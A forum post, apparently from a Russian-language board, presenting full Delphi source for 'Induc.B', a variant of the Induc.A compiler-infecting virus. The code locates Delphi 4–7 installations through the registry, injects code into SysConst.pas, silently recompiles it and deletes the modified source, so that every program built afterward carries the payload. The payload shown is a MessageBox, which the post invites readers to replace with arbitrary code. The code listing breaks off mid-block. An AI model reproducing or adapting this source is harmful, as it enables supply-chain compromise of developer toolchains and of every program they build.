Цитата:
The most Delphi Coders should know Induc.A, its one of the first Malwares who can modify the compiler in a way that the Compiler itself reproduces the Malware again.
I just analyzed Induc.A and realized how it works, so I wrote a second Version of it, which does not respread itself again.
This version just shows an MessageBox with "Infected by Induc.B" in EVERY App you compile with Delphi 4-7, but you can easily customize it.
Код:
Код:
{
Coder: Slayer616,Induc-Coder
Version: Induc.B
History: 19.05.2010 - First Try
This is a first, non-selfspreading Version of Induc!
Like you should see on "InfectionMessage" i just use a simple MessageBox
for the Infection, but you are able to customize that just by editing the
constant with your Delphi Code!
}
program prjIndux;
uses
windows,classes;
const
InfectionMessage:string = 'uses windows;' + #13#10 + 'begin' + #13#10 + 'MessageBoxA(0,pchar(''Infected by Induc.B''),pchar(''By Slayer616''),0);' + #13#10 + 'end.';
//Taken from Delphi Praxis
function FileToString(const FileName: string): AnsiString;
var
fs: TFileStream;
Len: Integer;
begin
fs := TFileStream.Create(FileName, $0000 or $0020);
try
Len := fs.Size;
SetLength(Result, Len);
if Len > 0 then
fs.ReadBuffer(Result[1], Len);
finally
fs.Free;
end;
end;
Procedure StringToFile(const FileName, Str: string);
var
fs: TFileStream;
Len: Integer;
begin
fs := TFileStream.Create(FileName, fmcreate);
try
Len := Length(Str);
fs.Write(Str[1], Len);
finally
fs.Free;
end;
end;
Function WriteInfection(sPath:string):boolean;
var
sPos:Integer;
sTempStr:string;
begin
result := false;
sTempStr :=FileToString(sPath + '\lib\sysconst.pas');
if sTempStr = '' then exit;
sPos := pos('implementation',sTempStr);
if sPos = 0 then exit;
sPos := sPos + 15;
sTempStr := copy(sTempstr,1,sPos);
sTempstr := sTempstr + InfectionMessage;
StringToFile(sPath + '\lib\sysconst.pas',sTempStr);
result := true;
end;
Function CompileInfectedSysconst(sPath:string):boolean;
var
SI:TStartupInfo;
PI:TProcessInformation;
begin
fillchar(SI,sizeof(SI),0);
SI.cb:=sizeof(SI);
SI.dwFlags:=STARTF_USESHOWWINDOW;
SI.wShowWindow:=SW_HIDE;
result := CreateProcess(nil,pchar(sPath + '\bin\dcc32.exe' +' '+ sPath +'\lib\sysconst.pas'),nil,nil,false,NORMAL_PRIORITY_CLASS,nil,nil,SI,PI);
if result then WaitForSingleObject(PI.hProcess,INFINITE)
end;
Function InfectSysconst(sPath:string):boolean;
begin
Result := true;
If CopyFile(Pchar(sPath + '\source\rtl\sys\SysConst.pas'), Pchar(sPath + '\lib\sysconst.pas'),false) = false then begin
Result := false;
Exit;
end;
If WriteInfection(sPath) = false then begin
Result := false;
Exit;
end;
If CompileInfectedSysconst(sPath) = false then begin
Result := false;
Exit;
end;
If DeleteFile(pchar(sPath + '\lib\sysconst.pas')) = false then begin
Result := false;
Exit;
end;
end;
Function BackUp(sPath:string):Boolean;
begin
Result := MoveFile(pchar(sPath+'\lib\sysconst.dcu'),pchar(sPath+'\lib\sysconst.bak'));
end;
var
cVersion:char;
c:array [1..255] of char;
i:integer;
sTemp,sSysconst:string;
k:HKEY;
begin
MessageBoxA(0,Pchar('Welcome to Induc.B' + #13#10 + 'Welcome to the Sysconst Infector!' + #13#10 + 'I will now try to find the Compiler and the Sysconst.pas...'),'',0);
for cVersion := '4' to '7' do begin
if RegOpenKeyEx(HKEY_LOCAL_MACHINE,pchar('Software\Borland\Delphi\'+ cVersion + '.0'),0,KEY_READ,k)=0 then begin
i:=255;
if RegQueryValueEx(k,'RootDir',nil,@i,@c,@i)=0 then begin
sTemp := '';
i:=1;
//Copy Array of Char into String
while c[i]<>#0 do begin
sTemp := sTemp + c[i];
inc(i);
end;
sSysconst := sTemp ;
MessageBoxA(0,Pchar('Delphi Version found: ' + cVersion + '.0' + #13#10 + 'Compilerpath: ' + sTemp + '\bin\dcc32.exe' + #13#10 + 'Sysconst.pas: ' + sSysconst + '\source\rtl\sys\SysConst.pas' + #13#10 + #13#10 + 'Now starting Backup of original Sysconst.dcu...'),pchar('WIN!'),0);
If Backup(sSysconst) = false then begin
MessageBoxA(0,Pchar('Failed to backup Sysconst!' + #13#10 + 'Cancelling Process...'),Pchar('Error!'),0);
Exit;
end;
MessageBoxA(0,Pchar('Backup completed!' + #13#10 + 'Backupfile: ' + sSysconst +'\lib\sysconst.bak' + #13#10 + #13#10 + 'Now infecting Sysconst...'),'',0);
If InfectSysconst(sSysconst) then begin
MessageBoxA(0,pchar('You are now infected by Induc.B' + #13#10 + 'For Desinfection just replace Sysconst.Bak with Sysconst.dcu in: ' + sSysconst +'\lib\sysconst.bak'),'',0);Отредактировано Kido (2010-05-30 21:20:11)
